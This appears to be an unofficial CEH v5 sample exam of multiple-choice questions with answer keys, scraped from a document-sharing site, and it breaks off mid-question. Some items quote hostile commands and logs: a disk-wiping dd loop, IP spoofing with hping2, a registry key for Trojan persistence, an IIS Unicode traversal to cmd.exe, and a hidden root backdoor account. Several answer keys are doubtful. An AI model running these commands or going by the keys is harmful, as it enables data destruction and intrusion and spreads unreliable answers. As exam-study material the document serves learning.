+ All Categories
Home > Documents > 6673158 CEH v5 Exam Study Guide

6673158 CEH v5 Exam Study Guide

Date post: 14-Dec-2015
Category:
Upload: licservernoida
View: 48 times
Download: 11 times
Share this document with a friend
Description:
CEH v5 Exam Study Guide
118
Do not distribute this document Prepared by Chan Tseng Loo, Beijing China CEHv5 Sample Exam Questions 1. Which command in Linux produces IP address and MAC address output? A. sudo nmap -sP 192.168.0.1/24 B. root nmap -sA 192.168.0.1/24 C. run nmap -TX 192.168.0.1/24 D. launch nmap -PP 192.168.0.1/24 Ans: a 2. What filter in ethereal will you use to view hotmail messages? a. (http contains "hotmail") && (http contains "Reply-To") b. (http contains "e-mail") && (http contains "hotmail") c. (http = "login.passport.com") && (http contains "SMTP") d. (http = "login.passport.com") && (http contains "POP3") Ans: a 3. What does this command do? for (( i = 0;i<11;i++ )); do dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done
Transcript
Page 1: 6673158 CEH v5 Exam Study Guide

Do not distribute this documentPrepared by Chan Tseng Loo, Beijing China

CEHv5 Sample Exam Questions

1.

Which command in Linux produces IP address and MAC address output?

A. sudo nmap -sP 192.168.0.1/24B. root nmap -sA 192.168.0.1/24C. run nmap -TX 192.168.0.1/24D. launch nmap -PP 192.168.0.1/24

Ans: a

2.

What filter in ethereal will you use to view hotmail messages?

a. (http contains "hotmail") && (http contains "Reply-To")b. (http contains "e-mail") && (http contains "hotmail")c. (http = "login.passport.com") && (http contains "SMTP")d. (http = "login.passport.com") && (http contains "POP3")

Ans: a

3.

What does this command do?

for (( i = 0;i<11;i++ )); do dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hdadone

a. He is making a bit stream copy of the entire hard disk for later downloadb. He is deleting log files to remove his tracec. He is wiping the contents of the hard with zerosd. He is infecting the hard disk with random virus strings

And: c

Page 2: 6673158 CEH v5 Exam Study Guide

4.

How would you permanently wipe the data in the hard disk?

a. $ wipe -fik /dev/hda1b. $ erase -fik /dev/hda1c. $ delete -fik /dev/hda1d. $ secdel -fik /dev/hda1

Ans: a

5.

Which commands scans for rootkits?

a. $ sudo chrootkitb. $ sudo avcheckc. $ sudo runvirusd. $ sudo rootvirus

Ans: a

6.

802.11a uses:

a. 5.15-5.825 GHzb. 2.412-2.462 GHzc. 2.323-2.462 GHzd. 900MHz-2.462 GHz

Ans: a

7.

What commands will you use in google to view linked pages?

a. link:www.xsecurity.comb. search?l:www.xsecurity.comc. level1:www.xsecurity.comd. pagerank:www.xsecurity.com

Ans: a

Page 3: 6673158 CEH v5 Exam Study Guide

8.

What command you use to search groups in google?

a. Search in Google using the key search strings "the target company" and "newsgroups"

b. Search for the target company name at http://groups.google.comc. Use NNTP websites to search for these postingsd. Search in Google using the key search strings "the target company" and "forums"

Ans: b

9.

You want to search for the existence of a Novell BorderManager Proxy/Firewall servers using Google.

What search string will you use?

a. intitle: "BorderManager information alert"b. insite: "BorderManager information alert"c. inweb: "BorderManager information alert"d. inpage: "BorderManager information alert"

Ans: a

10.

You would like to locate the presence of known vulnerable Web applications using Google search. What is the correct format for the search string?

INURL:["parameter="] with FILETYPE:[ext] and INURL:[scriptname]INPAGE:["scriptname ="] with STRING:[ext] and INURL:[parameter]LINKS:["ext="] with EXTENSIONS:[parameter] and INPAGE:[scriptname]INSITE:["parameter="] with FILETYPE:[ext] and INURL:[scriptname]

Ans: a

11.

Page 4: 6673158 CEH v5 Exam Study Guide

How do you stop web spidering?

a. Place robots.txt file in the root of your website with listing of directories that you don’t want to be crawled

b. Place authentication on directories that will prevent crawling from these spidersc. Enable SSL on the restricted directories which will block these spiders from

crawlingd. Place “HTTP:NO CRAWL” on the html pages that you don’t want the crawlers to

index

Ans: a

12.

What is the hexadecimal value of NOP instruction?

a. 0x90b. 0x80c. 0x70d. 0x60

Ans: a

13.

When writing shellcodes, you must avoid ____________ because these will end the string.

A. null bytesB. root bytesC. char bytesD. Unicode bytes

Ans: a

14.

Which of the following exclusive OR transforms bits is NOT correct?

A. 1 xor 1 = 1B. 0 xor 0 = 0

Page 5: 6673158 CEH v5 Exam Study Guide

C. 1 xor 0 = 1D. 0 xor 1 = 1

Ans: a

15.

How does a polymorphic shellcode work?

a. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode

b. They convert the shellcode into Unicode, using loader to convert back to machine code then executing them

c. They reverse the working instructions into opposite order by masking the IDS signatures

d. They compress shellcode into normal instructions, uncompress the shellcode using loader code and then executing the shellcode

Ans: a

16.

In Buffer Overflow exploit, which of the following registers gets overwritten with return address of the exploit code?

a. EIPb. ESPc. EAPd. EEP

Ans: a

17.

Which type of scan does not open a full TCP connection?

a. Stealth Scanb. XMAS Scanc. Null Scand. FIN Scan

Ans: a

Page 6: 6673158 CEH v5 Exam Study Guide

18.

How do you prevent a hacker from launching FIN, NULL, and X-MAS scans on your network?

A. Modify the kernel to never send reset packetsB. Block TCP/IP packets with FIN flag enabled at the firewallC. Enable IDS signatures to block these scansD. You cannot block a hacker from launching these scans on your network

Ans: a

19.

Which of the following encryption is not based on block cipher?

a. DESb. Blowfishc. AES (Rijndael)d. RC4

Ans: d

20.

TCP/IP Session Hijacking is carried out in which OSI layer?

a. Transport layerb. Datalink layerc. Network Layerd. Physical Layer

Ans: a

21.

SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False)

Ans: True

Page 7: 6673158 CEH v5 Exam Study Guide

22.

What defensive measures will you take to protect your network from password brute forcing attacks? (Select all that apply)

a. Never leave a default password.b. Never use a password that can be found in a dictionary.c. Never use a password related to the hostname, domain name, or anything else that

can be found with whois.d. Never use a password related to your hobbies, pets, relatives, or date of birth.e. Use a word that has more than 21 characters from a dictionary as the password

Ans: a,b,c,d

23.

An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying protocol does not reliably report closed ports. This means that 'no response' from the probed IP address can mean which of the following: (Select 3 answers)

a. Machine unreachableb. SNMP server not runningc. Invalid community stringd. S-AUTH protocol is running on the SNMP server

Ans: a,b,c

24.

You want to retrieve the Cisco configuration from the router. How would you proceed? (Select 2 answers)

A. Send a customized SNMP set request with a spoofed source IP address in the range - 192.168.1.0

B. Run a network sniffer and capture the returned traffic with the configuration file from the router

C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address

D. Use the Cisco’s TFTP default password to connect and download the configuration file

Page 8: 6673158 CEH v5 Exam Study Guide

Ans: a,b

25.

How would you discover what telephone numbers to dial-in to the router?

a. Search the Internet for leakage of target company’s telephone number to dial-in b. Run a war-dialing tool with range of phone numbers and look for CONNECT

responsec. Connect using ISP’s remote-dial in number since the company’s router has a

leased line connection established with themd. Brute force the company’s PABX system to retrieve the range of telephone

numbers to dial-in

Ans: b

26.

Hackers usually control Bots through:

IRC ChannelMSN MessengerTrojan client softwareYahoo ChatGoogleTalk

Ans: a

27.

How would you detect DNS reflectors on your network?

a. Run floodnet tool to detect these reflectorsb. Scan the network using Nmap for the services used by these reflectorsc. Look for the banner text by running Zobbie Zappers toolsd. Run Vulnerability scanner on your network to detect these reflectors

Ans: b

28.

What type of attacks target DNS Servers DOS?

Page 9: 6673158 CEH v5 Exam Study Guide

a. DNS reflector and amplification attackb. DNS cache poisoning attacksc. DNS reverse connection attacksd. DNS forward lookup attacks

Ans: a

29.

________ is a Cisco IOS mechanism that examines packets on Layers 4 to 7.

a. Network-Based Application Recognition (NBAR)b. Denial of Service Filter (DOSF)c. Rule Filter Application Protocol (RFAP)d. Signature-Based Access List (SBAL)

Ans: a.

30.

What does the following command do?

CEH# hping2 -I eth0 -a 10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq 0x0000000f 192.168.0.9

a. This command will generate a single TCP SYN packet with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6

b. This command will generate a single TCP UDP packet with source port 1037, destination port 15, with a sequence number 22 spoofing the IP address 192.168.0.9

c. This command will generate a multiple TCP SYN/ACK packets with source port 22, destination port 1037, with a sequence number 19 spoofing the IP address 192.168.0.9

d. This command will generate multiple TCP SYN packets with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6

Ans: a

31.

Page 10: 6673158 CEH v5 Exam Study Guide

What of the following is a IDS defeating technique?

a. IP Fragmentation or Session Splicingb. IP Routing or Packet Droppingc. IDS Spoofing or Session Assemblyd. IP Splicing or Packet Reassembly

Ans: a

32.

How do you defend against SSL attacks?

a. Install a proxy server and terminate SSL at the proxyb. Install a hardware SSL “accelerator” and terminate SSL at this layerc. Enable the IDS to filter encrypted HTTPS trafficd. Enable the Firewall to filter encrypted HTTPS traffic

Ans: a.b

33.

A digital signature is simply a message that is encrypted with the public key instead of the private key (True or False)

Ans: False

34.

What is p and q in terms of PKI?

a. factorizationb. prime detectionc. hashingd. brute-forcing

ans: a

35.

How do you block password brute forcing?

Page 11: 6673158 CEH v5 Exam Study Guide

A. Enforce a password policy and use account lockouts after three wrong logon attempts even though this might lock out legit users

B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the Firewall manually

C. Enforce complex password policy on your network so that passwords are more difficult to brute force

D. You cannot completely block the intruders attempt if they constantly switch proxies

Ans: d

36.

What attacks can you successfully launch against a server using the SYN/ACK technique?

a. Session Hijacking attacksb. Denial of Service attacksc. Web page defacement attacksd. IP spoofing attacks

Ans: a

37.

How do you protect your network against SYN Flood attacks? (Select all that apply)

a. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP address, port number, and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus, the server first allocates memory on the third packet of the handshake, not the first

b. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normally

c. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16-bytes for the incoming SYN object

d. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection

e. Check the incoming packet’s IP address with the SPAM database on the Internet and enable the filter using ACLs at the Firewall

Page 12: 6673158 CEH v5 Exam Study Guide

Ans: a,b,c,d

38.

Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks. What type of Denial of Service attack is represented here?

1. LAND attacks2. Targa attacks3. SYN Flood attacks4. SMURF Attacks

Ans: a

39.

Who are the primary victims of SMURF attacks on the Internet today?

a. IRC servers are the primary victim to smurf attacksb. IDS devices are the primary victim to smurf attacksc. Mail servers are the primary victim to smurf attacksd. SPAM filters are the primary victim to smurf attacks

Ans: a

40.

Which of the following is NOT an example of default installation?

a. Many systems come with default user accounts with well-known passwords that administrators forget to change

b. Often, the default location of installation files can be exploited which allows a hacker to retrieve a file from the system

c. Many software packages come with "samples" that can be exploited, such as the sample programs on IIS web services

d. Enabling port 80 on Web Servers for public access and asking your customers to visit your website using non standard port

Ans: d

41.

Page 13: 6673158 CEH v5 Exam Study Guide

Which event log located at c:\windows\system32\config contains the trace of your brute force attempts?

a. AppEvent.Evtb. SecEvent.Evtc. SysEvent.Evtd. WinEvent.Evt

Ans: b

42.

If the password is 7 characters or less, than the second half of the LM hash is always:

0xAAD3B435B51404EE0xAAD3B435B51404AA0xAAD3B435B51404BB0xAAD3B435B51404CC

Ans: a

43.

How do you penetrate high security systems such as banks?

a. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they’ll abuse their access privileges by providing you with sensitive information

b. Look for “zero-day” exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank’s network

c. Launch DDOS attacks against Merclyn Barley Bank’s routers and firewall systems using 100,000 or more “zombies” and “bots”

d. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank’s Webserver to that of your machine using DNS Cache Poisoning techniques

Ans: a

44.

Page 14: 6673158 CEH v5 Exam Study Guide

What is “weakest Link”?

1. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain

2. “zero-day” exploits are the weakest link in the security chain since the IDS will not able to detect these attacks

3. “Polymorphic viruses” are the weakest link in the security chain since the Anti-Virus scanners will not able to detect these attacks

4. Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway.

Ans: a

45.

What is the UK cybercrime law called?

a. Computer Misuse Act 1990b. Computer Incident Act 2000c. Cyber Crime Law Act 2003d. Cyber Space Crime Act 1995

Ans: a

46.

You can always defend yourself by "ignorance of the law" clause. (True or False)

Ans: False

47.

Technique to prevent against password attacks?

a. Implement Biometrics based password authentication system. Record the customers face image to the authentication database

b. Configure your firewall to block logon attempts of more than three wrong tries c. Implement RSA SecureID based authentication system d. Enable a complex password policy of 20 characters and ask the user to change the

password immediately after they logon and do not store password histories

Ans: c

Page 15: 6673158 CEH v5 Exam Study Guide

48.

Every company needs this document?

a. Information Security Policy (ISP)b. Information Audit Policy (IAP)c. Penetration Testing Policy (PTP)d. User Compliance Policy (UCP)

Ans: a

49.

This is a patch management utlity

a. MBSAb. BSSAc. ASNBd. PMUS

Ans: a

50.

Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. (Select all that apply)

a. New installation of Windows should be patched by installing the latest service packs

b. Key applications such as Adobe Acrobat, Macromedia Flash, Java, Winzip etc must have the latest security patches installed

c. Install a personal firewall and lock down unused ports from connecting to your computer

d. Install the latest signatures for Antivirus softwaree. Configure “Windows Update” to automaticf. Create a non-admin user with a complex password and logon to this accountg. You can start using your computer since the vendor such as DELL, HP and IBM

already would have installed the latest service packs up-to-date

Ans: a,b,c,d

Page 16: 6673158 CEH v5 Exam Study Guide

51.

Which switch shows you the application listening on ports?

1. netstat -anb -p tcp 2. netstat -an -p tcp –x3. netstat -an -p tcp –c4. netstat -an -p tcp –l

Ans: a

52.

Test virus is created by:

a. Type the following code in notepad and save the file as EICAR.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

b. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

c. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

d. Type the following code in notepad and save the file as SAMPLEVIRUS.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Ans: a

53.

Joke viruses are called?

Page 17: 6673158 CEH v5 Exam Study Guide

1. Virus hoax2. Spooky Virus3. Stealth Virus4. Polymorphic Virus

Ans: a

54.

Act to prevent SPAM e-mails

a. 2004 CANSPAM Actb. 2003 SPAM Prevention Actc. 2005 US-SPAM 1030 Actd. 1990 Computer Misuse Act

Ans: a

55.

Passwords are never cracked in these attacks

a. Replay Attacksb. Brute Force Attacksc. Cryptography Attacksd. John the Ripper Attacks

Ans: a

56.

This is an authentication method in which is used to prove that a party knows a password without transmitting the password in any recoverable form over a network. This authentication is secure because the password is never transmitted over the network, even in hashed form; only a random number and an encrypted random number are sent.

a. Challenge/Response Authenticationb. Basic Form Authenticationc. Realm Authenticationd. SSL Authenticatione. Cryptographic Authentication

Page 18: 6673158 CEH v5 Exam Study Guide

Ans: a

57.

Where are password files kept in Linux?

a. /etc/shadowb. /etc/passwdc. /bin/passwordd. /bin/shadow

Ans: a

58.

You are configuring the security options of your mail server and you would like to block certain file attachments to prevent viruses and malware from entering the users inbox.

Which of the following file formats will you block? (Select all that apply)

a. .pifb. .scrc. .txtd. .come. .exef. .rarg. .vbsh. .htai. .jpg

Ans: a,b,d,e,g,h

59.

This tool floods the switch with bogus MAC addresses

a. ./macofb. ./sniffofc. ./dsniffd. ./switchsnarf

Page 19: 6673158 CEH v5 Exam Study Guide

Ans: a

60.

The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). This flag releases the connection resources. However, host A can continue to receive data as long as the SYN sequence numbers of transmitted packets from host B are lower than the packet segment containing the set FIN flag (True or False)

Ans: True

61.

How would you compromise a system, which relies on cookie-based security?

a. Intercept the communication between the client and the server and change the cookie to make the server believe that there is a user with higher privileges

b. Brute force the encryption used by the cookie and replay it back to the serverc. Inject the cookie ID into the web URL and connect back to the serverd. Delete the cookie and reestablish connection to the server and access higher level

privileges

Ans: a

62.

Which port does SMB over TCP/IP use?

445139179443

Ans: a

63.

You want to make a Trojan persistent so that it survives computer reboots. Which registry entry will you add a key to make it persistent?

Page 20: 6673158 CEH v5 Exam Study Guide

a. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

b. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Start

c. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto

d. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Desktop

Ans: a

64.

How would you prevent users computer at home using VPN safe?a. Disable VPN access to all your employees from home machinesb. Allow VPN access but replace the standard authentication with biometric

authenticationc. Replace the VPN access with dial-up modem access to the company’s networkd. Enable 25 character complex password policy for employees to access the VPN

network

Ans: a

65.

Which programming language is NOT vulnerable to buffer overflow attacks?

a. Javab. ActiveXc. C++d. Assembly Language

Ans: a

66.

How do you secure GET method in web page posts?

A. Replace the GET with POST method when sending dataB. Never include sensitive information in a scriptC. Use HTTPS SSLv3 to send the data instead of plain HTTPS

Page 21: 6673158 CEH v5 Exam Study Guide

D. Encrypt the data before you send using GET method

Ans: a

67.

Two types of BO

a. Stack based buffer overflowb. Active buffer overflowc. Dynamic buffer overflowd. Heap based buffer overflow

Ans: a,d

68.

Which of the following line in the C++ source code is vulnerable to buffer overflow exploits?

1. #include <stdio.h>2. #include <stdlib.h>3. #include <string.h>4. #include <ctype.h>5. #define MAXNAMELEN 506. #define MAXLINELEN 5007. int FullFlag;8. //Deletes the first word from a string9. char *delfirstword(char *s)10. {11. char *sout = (char *)malloc(strlen(s));12. int i = 0, i2 = 0;13. if (s[0] == (char)NULL) return s; 14. while (isspace(s[i])) i++;15. while ((!isspace(s[i])) && (s[i] != (char)NULL)) i++;16. if (s[i] == (char)NULL) return "";17. while ((isspace(s[i])) && (s[i] != (char)NULL)) i++;18. while (s[i] != (char)NULL)19. {20. sout[i2] = s[i];21. i++; i2++;22. }23. sout[i2] = (char)NULL;24. return sout;25. }26. //Returns the soundex equivalent to In 27. char *Soundex(char *In)28. {29. int Iin, Iout;30. char C, PrevDig, *Out = (char *)malloc(10);

Page 22: 6673158 CEH v5 Exam Study Guide

31. if (FullFlag)32. {Iin = 0; Iout = 0; PrevDig = '*';}33. else34. {Iin = 1; Iout = 1;35. Out[0] = tolower(In[0]); PrevDig = Out[0];}36. while ((In[Iin] != (char)NULL) && (Iout <= 4)) 37. {38. In[Iin] = tolower(In[Iin]);39. switch (In[Iin])40. {41. case 'b' : C = '1'; break;42. case 'p' : C = '1'; break;43. case 'f' : C = '1'; break;44. case 'v' : C = '1'; break;45. case 'c' : C = '2'; break;46. case 's' : C = '2'; break;47. case 'k' : C = '2'; break;48. case 'g' : C = '2'; break;49. case 'j' : C = '2'; break;50. case 'q' : C = '2'; break;51. case 'x' : C = '2'; break;52. case 'z' : C = '2'; break;53. case 'd' : C = '3'; break;54. case 't' : C = '3'; break;55. case 'l' : C = '4'; break;56. case 'm' : C = '5'; break;57. case 'n' : C = '5'; break;58. case 'r' : C = '6'; break;59. default : C = '*';60. }61. if ((C != PrevDig) && (C != '*'))62. {63. Out[Iout] = C;64. PrevDig = Out[Iout];65. Iout++;66. }67. Iin++;68. }69. if (Iout < 4)70. for (Iin=Iout; Iin<4; Iin++)71. Out[Iin] = '0';72. Out[4] = NULL; 73. return Out;74. }75. //Main function76. int main(int argc, char *argv[])77. {78. char *Name = (char *)malloc(MAXNAMELEN), *Line = (char

*)malloc(MAXLINELEN);79. int I;80. FullFlag = 0;81. if (argc >= 2)82. {83. if (!strcmp(argv[1], "-f"))84. FullFlag = 1;85. if ((!strcmp(argv[1], "-h")) || (!strcmp(argv[1], "-?")) ||86. (!strcmp(argv[1], "?")))

Page 23: 6673158 CEH v5 Exam Study Guide

87. {88. printf("Usage: soundex [-f] <name1> <name2> ...\n\n");89. printf("-f treats the first character of name just like the

others.\n");90. printf("If no names are specified in the arguments, soundex

will read\n");91. printf("from the standard input until end of file is

encountered.\n");92. printf("Note that names of two characters or less are

disregarded.\n");93. }94. }95. if (FullFlag && (argc >= 3))96. {97. for (I=2; I<=(argc-1); I++)98. if (strlen(argv[I]) >= 3) 99. printf("%s ", Soundex(argv[I]));100. printf("\n");101. return 0;102. }103. if ((!FullFlag) && (argc >= 2))104. {105. for (I=1; I<=(argc-1); I++)106. if (strlen(argv[I]) >= 3) 107. printf("%s ", Soundex(argv[I]));108. printf("\n");109. return 0;110. }111. while (gets(Line) != NULL) 112. {113. while (strcmp(Line, ""))114. {115. sscanf(Line, "%s", Name);116. if (strlen(Name) >= 3) 117. printf("%s ", Soundex(Name));118. strcpy(Line, delfirstword(Line));119. } 120. printf ("\n");121. }122. free(Line); free(Name);123. return 0;124. }

Type the line number here: 118

69.

Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks? (Select 3 answers)

a. strcpy()b. strcat()c. streadd()

Page 24: 6673158 CEH v5 Exam Study Guide

d. strlength()

Ans: a,b,c

70.

What is the countermeasure against XSS scripting?

1. Create an IP access list and restrict connections based on port number2. Replace “<” and “>” characters with “&lt;” and “&gt;” using server

scripts3. Disable Javascript in IE and Firefox browsers4. Connect to the server using HTTPS protocol instead of HTTP

Ans: b

71.

Microsoft Authenticode technology is used for:

a. Digitally signing ActiveX controlsb. Digitally signing SSL certificatesc. Digitally signing Javascript filesd. Digitally signing Java Applets

Ans: a

72.

Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers? (True or False)

Ans: True

73.

How do you defend against ARP Spoofing? (Select 3 answers)

a. Place static ARP entries on servers, workstation and routersb. Tune IDS Sensors to look for large amount of ARP traffic on local subnetsc. Use private VLANSd. Use ARPWALL system and block ARP spoofing attacks

Page 25: 6673158 CEH v5 Exam Study Guide

Ans: a,b,c

74.

You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5 to Cisco router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence and acknowledgement numbers to successfully hijack the telnet session.

Here is the captured data in tcpdump.

Victim Machine Router 10.0.0.5 ------------------------ 10.0.0.1

SYN Seq.no. 17768656 ---------- (next seq.no. 17768657) Ack.no. 0 Window 8192 LEN = 0 bytes

--------------------------------- SYN-ACK

Seq.no. 82980009 (next seq.no. 82980010) Ack.no. 17768657 Window 8760 LEN = 0 bytes

ACK Seq.no. 17768657 ---------- (next seq.no. 17768657) Ack.no. 82980010 Window 8760 LEN = 0 bytes

Seq.no. 17768657 ---------------- (next seq.no. 17768729) Ack.no. 82980010 Window 8760 LEN = 72 bytes of data

---------------------------------- Seq.no. 82980010 (next seq.no. 82980070) Ack.no. 17768729 Window 8688 LEN = 60 bytes of data

Seq.no. 17768729 ----------------- (next seq.no. 17768885) Ack.no. 82980070 Window 8700 LEN = 156 bytes of data ---------------------------------- Seq.no. ????????

Ack.no. ????????

Page 26: 6673158 CEH v5 Exam Study Guide

Window 8532 LEN = 152 bytes of data

What are the next sequence and acknowledgement numbers that the router will send to the victim machine?

Sequence number: 82980070 Acknowledgement number: 17768885Sequence number: 17768729 Acknowledgement number: 82980070Sequence number: 87000070 Acknowledgement number: 85320085Sequence number: 82980010 Acknowledgement number: 17768885

Ans: a

75.

FIN Scanning does not correctly work on which of the following machines?

a. Windows machinesb. Linux machinesc. Sun Solaris machinesd. WiFi Devices

Ans: a

76.

This scanning technique sends the probe packet, splitting up the TCP header over several packets to make it harder for packet filters to detect what is happening.

a. SYN Scanningb. XMAS Scanningc. Fragmentation Scanningd. Stealth Scanning

Ans: c

77.

What is the term used in serving different types of web pages based on the users IP address?

1. Website Cloaking2. Website Filtering3. IP Access Blockade

Page 27: 6673158 CEH v5 Exam Study Guide

4. Mirroring Website

Ans: a

1. Dan is conducting a pen-test and has found a vulnerability in a Web App which gave himthe sessionID token via a cross site scripting vulnerability. Dan wants to replay this token.However, the session ID manager (on the server) checks the originating IP address aswell. Dan decides to spoof his IP address in order to replay the sessionID. Why do youthink Dan might not be able to get an interactive session?

a. The server will send replies back to the spoofed IP address and henceinteractivity would be difficult*b. Dan cannot spoof his IP address over TCP networkc. The scenario is incorrect as Dan can spoof his IP and get responsesd. Dan can establish an interactive session only if he uses a NAT

2. Clive is conducting a pen-test and has just port scanned a system on the network. He hasidentified the operating system as Linux and been able to elicit responses from ports 23,25 and 53. He infers port 23 as running Telnet service, port 25 as running SMTP serviceand port 53 as running DNS service. The client confirms these findings and attests to thecurrent availability of the services.When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typingother commands, he sees only blank spaces or underscores symbols on the screen. Whatare you most likely to infer from this?

a. This indicates that the telnet and SMTP server have crashedb. There is a honeypot running on the scanned machinec. The services are protected by TCP wrappers*d. An attacker has replaced the services with trojaned ones

3. Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replaythe cookie even while the session is valid on the server. Why do you think this is possible?

a. It works because any encryption is performed at the application layer (singleencryption key)*b. The scenario is invalid as a secure cookie cannot be replayedc. It works because any encryption is performed at the network layer (layer 1encryption)d. Any cookie can be replayed irrespective of the session status

Page 28: 6673158 CEH v5 Exam Study Guide

4. Study the snort rule given below and interpret the rule. Choose the correct optionalert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)

a. An alert is generated when a TCP packet is generated from any IP on the192.168.1.0 subnet and destined to any IP on port 111b. An alert is generated when a TCP packet originating from any IP address is seenon the network and destined for any IP address on the 192.168.1.0 subnet on port111*c. An alert is generated when any packet other than a TCP packet is seen on thenetwork and destined for the 192.168.1.0 subnetd. An alert is generated when a TCP packet is originated from port 111 of any IPaddress to the 192.168.1.0 subnet

5. What is the command used to create a binary log file using tcpdump?

a. tcpdump -w ./log*b. tcpdump -r logc. tcpdump -vde –r logd. tcpdump -l /var/log/

6. what scan type usedtcpdump -vv -x host 192.168.1.1017:35:06.731739 eth0 < 192.168.1.10 > victim: ip-proto-130 0 (ttl 59, id 42060)4500 0014 a44c 0000 3b82 57b8 c0a8 010ac0a8 0109 0000 0000 0000 0000 0000 00000000 0000 0000 0000 0000 0000 0000a. nmap -sO -T 192.168.1.10*b. nmap –sS 192.168.1.10c. nmap –sV 192.168.1.10d. nmap –sR 192.168.1.10

7. Study the following log extract and answer the questions below12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF***AP*** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 2047 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/.....2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c:5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 \ HTTP/1.1..AcceIdentify the Attacka. Hexcode Attackb. Unicode Directory Traversal Attack*c. Cross Site Scriptingd. Multiple Domain Traversal Attack

Page 29: 6673158 CEH v5 Exam Study Guide

8. Here is an extract from the snort log on a honeypot. Answer the following questions basedon this.12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21TCP TTL:50 TOS:0x0 ID:53476 DF*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78TCP Options => NOP NOP TS: 126045057 10580309850 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ...........What service is being exploited here?a. Telnetb. SMTPc. SSHd. FTP*

10. What do you infer from the attack?a. The exploit was successfulb. The exploit was not successful*c. A new user id was createdd. A new port was opened

A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 differentsites. 77 of the ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072. 13 of theICMP_ECHO packets had an ICMP ID:0 and Seq:0. What can you infer from thisinformation?a. ICMP ID and Seq numbers were most likely set by a tool and not by the operatingsystem*b. All 77 packets came from the same LAN segment and hence had the same ICMPID and Seq numberc. 13 packets were from an external network and probably behind a NAT, as theyhad an ICMP ID 0 and Seq 0d. The packets were sent by a worm spoofing the IP addresses of 47 infected sites

Study the following log entries and answer the questions below.mkdir -p /etc/X11/applnk/Internet/.etcmkdir -p /etc/X11/applnk/Internet/.etcpasswdtouch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswdtouch -acmr /etc /etc/X11/applnk/Internet/.etcpasswd nobody -d/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bashpasswd dns -dtouch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwdtouch -acmr /etc/X11/applnk/Internet/.etc /etc

12. What is the attacker ultimately trying to achieve as inferred from the log sequence?a. Extract information from a local directory

Page 30: 6673158 CEH v5 Exam Study Guide

